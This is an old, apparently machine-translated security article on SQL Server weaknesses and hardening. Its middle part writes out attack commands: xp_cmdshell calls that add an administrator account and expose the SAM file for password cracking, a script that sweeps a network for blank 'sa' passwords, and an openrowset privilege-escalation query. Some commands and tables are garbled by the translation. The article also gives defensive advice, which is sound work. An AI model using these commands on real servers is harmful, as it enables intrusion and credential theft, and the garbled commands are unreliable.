SQL SERVER Security issues

SQL SERVER Security issues

By xundi <security focus>
Xundi1@21cn.com
Www.xfocus.org

At present, there are many methods for NT Server Intrusion, such as exploiting IIS vulnerabilities,
You don't know. Actually, through the SQL database server associated with the NT Server
The example is also a very proportional method. You can refer to the following news:
Http://www.vnunet.com/news/1110838.
Some websites damaged by Herbless intrusion, such as the legoland. co. uk site is through the SQL Server
To gain control of the system and damage the system. Therefore, SQL Server protection is essential.
Few. Here I have sorted out some vulnerabilities for your reference.

----------------------------------------------------------------
Let's take a look at the network protocol library supported by the SQL service program:

----------------------------------------------------------------
| SQL Server Network Protocol Libraries |
----------------------------------------------------------------
| Protocol library | possible vulnerabilities | encrypted or not |
----------------------------------------------------------------
| Named pipes | -- use the nt smb port (TCP139, udploud, | no |
| (Famous Pipeline) | 138) for communication, which can be passed |
| Firewall control |
| Random access is also a small defect |
| -- The username, password, and data are not added |
| Transmission. Anyone can use SNIFFER |
| Capture data. |
----------------------------------------------------------------
| IP Sockets | -- 1433 ports are enabled by default, which can be used | no |
| The scanner is used to view the port. |
| Data can be intercepted by SNIFFER. |
----------------------------------------------------------------
| Multi-Protocol | -- the client must support NT RPCs. | yes |
| Type environment may cause problems. |
| -- TCP random port is used by default, but |
| Fixed implementation of the firewall's port diagram (parameter |
| KB Q164667 ). |
| -- Whether or not to select encryption options |
| This option is not selected. |
----------------------------------------------------------------
| NWLink | -- risks of data being intercepted by SNIFFER | no |
----------------------------------------------------------------
| AppleTalk (ADSP) | -- risks of data being intercepted by SNIFFER | no |
----------------------------------------------------------------
| Banyan Vines | -- risks of data interception by SNIFFER | no |
----------------------------------------------------------------

We recommend that you use Named Pipes or
Multi-protocol: Use these protocol libraries. If possible, try to use Multi-protocol.
And enable encryption options. If the above few cannot be used, use IP Sockets protocol and change
Its default port and check the system at any time to ensure that no SNIFFER exists. In addition, consider using a WEB server
Service or COM component as the business object layer of the application, and in the middle layer and the SQL service
Use the secure channel in sequence ). Many third-party products can encrypt communications in this area.

-----------------------------------------------------------------------
Next, let's talk about the various security modes of SQL SERVER and how they work?

The security mode defines how SQL SERVER authenticates users who want to use their services. See the following
The security mode of SQL Server 6.5 is different from that of SQL Server 7.0:

-------------------------------------------------------------------
| Security mode | SQL Server 6.5 | SQL Server 7.0 is changed |
-------------------------------------------------------------------
| Standard | -- the login is defined in SQL server | -- the Standard mode is set to SQL SERVER. |
| Standard mode | and the password is given. | No longer used. |
| -- SQL SERVER logon account and |
| Windows NT separated |
-------------------------------------------------------------------
| Integrated |-use security manager SQL account | -- here it becomes "Windows NT only" |
| Comprehensive mode | user. | Mode. |
|-The user is connecting to SQL SERVER | -- only works in the NT system and does not work in WIN9X |
| No need to separate LOGIN and | supported. |
| Password. |
|-The password is never stored in the application | -- can be directly integrated into the NT group for convenience |
| Medium, not in plain text in the network | management, (note that there is a BUILTIN group in |
| Transmission. | Generated on the local system). |
|-SQL SERVER can use NT |
| To authenticate the user and |
| It can be used, such as account expiration. |
|-Named Pipe or Multi-is required |
| Protocol Library. |
--------------------------------------------------------------------
| Mixed |-provides features of the preceding method | -- becomes SQL SERVER and WINDOWS NT |
| Mixed mode | customers are the ones that sign off but return back | mode. |
| The client cannot establish a trusted connection. | -- Use the window nt only mode whenever possible |
--------------------------------------------------------------------

Login is only the first step. Once a user logs on, the user must access an independent database.
The sysusers table must contain a table for each database used by the user. Therefore, security
Please note that there is a "guest" account in your database and you will not give it when you do not pay attention to it
Some people access your database.

For details, refer to Microsoft's website:

Http://www.microsoft.com/technet/ SQL /Technote/secure.asp


---------------------------------------------------------------------

SQL SERVER Security Issues:

If a "sa" account exists, the password is blank and the password is a member of the SQL SERVER Security Module.
You can use xp_mongoshell stored procedure (extended stored procedure)
Such:

Xp_mongoshell "net user testuser UgotHacked/ADD"
Then in:
Xp_mongoshell "net localgroup Administrators testuser/ADD"

In this way, the attacker successfully added a user to SQL SERVER.

Of course, remote connection usually requires 1433 ports to be opened and connected through the MYSQL client.

Of course, you can also use:

Xp_mongoshell "rdisk/s -"

In this way, the information in the winnt epair directory is rebuilt without prompting the user. Then
After SAM backup, attackers can establish an SMB connection to share or establish a connection:

Xp_mongoshell "net share getsam = c: winnt epair"

Use Sharing to get this file, and then run it with l0phtcrack. If the SMB port is used by the firewall
Attackers can also copy the sam. _ file to the WEB Directory for anonymous browsers.
Download. If IIS is not enabled, why not use tftp :).

OK. Through this controlled SQL SERVER, attackers can use it to find the internal network.
The following is an SQL script used to list the existence of other SQL servers on the network.
Example of an empty account 'sa:

-----------------------------------------------------------------------

-- Create temp table to store enumerated servers

SET NOCOUNT ON

Create table # temp (shelldump varchar (255 ))

INSERT # temp EXEC xp_cmdshell 'SQL-L'

DECLARE @ current_server varchar (255), @ conn_string varchar (255)

DECLARE SQL _cursor CURSOR FOR SELECT * FROM # temp

OPEN SQL _cursor fetch next from SQL _cursor INTO @ current_server

-- Loop through potential targets and check for null sa accounts

-- If target is vulnerable, version information will be displayed

WHILE @ FETCH_STATUS = 0

BEGIN

If @ current_server <> 'Servers :'

BEGIN

SELECT @ current_server = rtrim (ltrim (@ current_server ))

SELECT @ conn_string = 'exec xp_mongoshell 'SQL-s' + @ current_server +'-Usa-P-Q "select @ version "''

PRINT 'attempting connection to server: '+ @ current_server

EXECUTE (@ conn_string)

PRINT '============================================== ==================================='

END

Fetch next from SQL _cursor INTO @ current_server

END

-- Clean up

CLOSE SQL _cursor

DEALLOCATE SQL _cursor

Drop table # TEMP

----------------------------------------------------------------------

Of course, some people may also disable xp_extenshell extended stored procedure (extended stored procedure ),
You can also use the following method:

Xp_regread 'hkey _ LOCAL_MACHINE ', 'securitysamdomainsaccount', 'F'

If the MSSqlserver service runs under a local system account and syskey is not installed on the system
You can return the encrypted password or SID in the registry.

--------------------------------------------------------------------------

Another vulnerability is about adhoc heterogenous queries privilege escalation. For more information, see Microsoft
Description: http://www.microsoft.com/technet/security/bulletin/fq00-014.asp

For the above vulnerabilities, you can use the following xploit to raise the right:

SELECT * from openrowset ('sqloledb', 'Trusted _ Connection = Yes; Data Source = myserver ',
'Set fmtonly off execute master .. xp_cmdshell "dir c :"')

This is one of your favorite ways to execute other commands.

---------------------------------------------------------------------------

There is also a recent vulnerability: Extended Stored Procedure Parameter Parsing (Extended storage
Process parameter parsing) vulnerability, detailed information in this URL is described:
Http://www.microsoft.com/technet/security/bulletin/ms00-092.asp.

The main problem is that an API function srv_paraminfo () is provided in MSD, which is used to extend the storage process calling time.
Explain the parameters in depth, for example:

Exec <stored procedure name> <parameter 1>, <parameter 2> ,...
To query the directory tree of "c: winnt", it can be expressed as follows:
Exec xp_dirtree 'C: winnt'

However, if the length of each parameter is not checked, passing a long string will overwrite other stacks.
The parameter may cause buffer overflow.

The process is as follows:
Currently, the affected extended storage process is known as follows:

1. xp_peekqueue (xpqueue. dll)
Xp_printstatements (xprepl. dll)

Passing a long string to the first parameter overwrites the return address saved by the exception handler.

2. xp_proxiedmetadata (xprepl. dll)

The stored procedure uses four parameters. Passing a long string to the second parameter will overwrite the exception
The return address saved by the program.

3. xp_SetSQLSecurity (xpstar. dll)

The stored procedure uses four parameters. Passing a long string to the third parameter will make the entire SQL
The Server process is terminated immediately.

4. xp_displayparamstmt (xprepl. dll)
Xp_enumresultset (xprepl. dll)
Xp_showcolv (xprepl. dll)
Xp_updatecolvbm (xprepl. dll)

Passing a long string to the first parameter will result in illegal operations and overwrite the returned data stored by the exception handler.
Return address.

Here is a tricky thing for everyone. If you want to know that these extended stored procedures call the dll
File, you can perform the following operations, such:

Select o. name, c. text from dbo. syscomments c, dbo. sysobjects o where c. id = o. id and o. name
= 'XP _ peekqueue'

In this way, you can obtain the DLL that calls this extended stored procedure. If Microsoft does not have a patch, you will
Temporarily rename this DLL file. Of course, some DLL files call several extended stored procedures and cannot be changed blindly,
Otherwise, you will not be able to use other functions. You need to use the following operations to understand the extended stored procedures called by the DLL:

Select o. name, c. text from dbo. syscomments c, dbo. sysobjects o where c. id = o. id and c. text = 'xpqueue. dll'

Fortunately, Microsoft has released a patch. You can find it in the following places, instead of looking for DLL programs one by one:

Http://support.microsoft.com/support/ SQL /xp_security.asp

This vulnerability @ stake discovers and provides the demo test code, which can be found here:

Http://www.atstake.com/research/advisories/2000/sqladv2-poc.c

--------------------------------------------------------------------------

OK. Of course, SQL SERVER also has some other vulnerabilities, which are relatively minor, such as the administrator discovered by ISS.
Login id is stored in the registry. The encryption method is simple and easy to obtain. Details
See http://xforce.iss.net/alerts/advise45.php3. You can go to other
Find a place.

---------------------------------------------------------------------

Some security suggestions for SQL SERVER systems:

-- Install the latest security patches as follows:
Windows NT 4.0-Service Pack 6a

SQL Server 6.5-Service Pack 5a

SQL Server 7.0-Service Pack 2. (Various hotfixes-check
Http://www.microsoft.com/download)

SQL Server 2000-Hotfix S80233i.exe (Intel)
Of course, everyone should pay close attention to Microsoft's security announcements.

-- Do not use port 1433 on IP sockets. If you use Multi-protocol
Modify the port.

-- Do not embed the 'sa 'password into any application such as VB/DELPHI apps, or
In the global. asa file, because "sa" is a default password of SQL Server, its permissions
Similar to the administrator account in windows nt, the password is empty.

-- Change the password of the 'sa 'and 'probe' accounts.

-- Ensure that SQL SERVER errors are recorded on the NTFS system.

-- If you do not need xp_cmdshell (use sp_dropextendedproc 'XP _ cmdshell ')
Do not leave xp_extenshell extended stored proc (extended stored procedure) in the service
. In any isql window, enter:
Use master
Sp_dropextendedproc 'XP _ export shell'

-- Discard the automatic OLE stored procedure, of course, some features of Enterprise Manager are also
These processes are as follows:

Sp_OACreate Sp_OADestroy

Sp_OAGetErrorInfo Sp_OAGetProperty

Sp_OAMethod Sp_OASetProperty

Sp_OAStop

-- Remove the undesired registry access process as follows:

Xp_regaddmultistring

Xp_regdeletekey

Xp_regdeletevalue

Xp_regenumvalues

Xp_regread

Xp_regremovemultistring

Xp_regwrite

-- Remove the stored procedures of other systems. If you think you still have threats
Be careful when dropping these processes. You can test them on the testing machine to ensure that you are normal.
The system can complete the work, including:

Sp_bindsession sp_cursor sp_cursorclose
Sp_cursorfetch sp_cursoropen sp_cursoroption
Sp_getbindtoken sp_GetMBCSCharLen sp_IsMBCSLeadByte
Sp_OACreate sp_OADestroy sp_OAGetErrorInfo
Sp_OAGetProperty sp_OAMethod sp_OASetProperty
Sp_OAStop sp_replcmds sp_replcounters
Sp_repldone sp_replflush sp_replstatus
Sp_repltrans sp_sdidebug xp_availablemedia
Xp_cmdshell xp_deletemail xp_dirtree
Xp_dropwebtask xp_dsninfo xp_enumdsn
Xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks
Xp_eventlog xp_findnextmsg xp_fixeddrives
Xp_getfiledetails xp_getnetname xp_grantlogin
Xp_logevent xp_loginconfig xp_logininfo
Xp_makewebtask xp_msver xp_perfend
Xp_perfmonitor xp_perfsample xp_perfstart
Xp_readerrorlog xp_readmail xp_revokelogin
Xp_runwebtask xp_schedulersignal xp_sendmail
Xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap
Xp_sprintf xp_sqlinventory xp_sqlregister
Xp_sqltrace xp_sscanf xp_startmail
Xp_stopmail xp_subdirs xp_unc_to_drive

-- Remove the guest user from the database.
-- Disable SQL MAIL compatibility to prevent passing of Trojans and viruses.
-- Set a task to periodically run the following program:

Findstr/C: "Login Failed" mssql7log *.*'

Redirect to another file or MAIL to the administrator mailbox.

-- Check accounts with empty passwords frequently:

Use master
Select name,
Password
From syslogins
Where password is null
Order by name

-- Check all stored procedures that do not require the 'sa 'permission and access permissions for extended stored procedures:

Use master
Select sysobjects. name
From sysobjects, sysprotects
Where sysprotects. uid = 0
AND xtype IN ('X', 'P ')
AND sysobjects. id = sysprotects. id
Order by name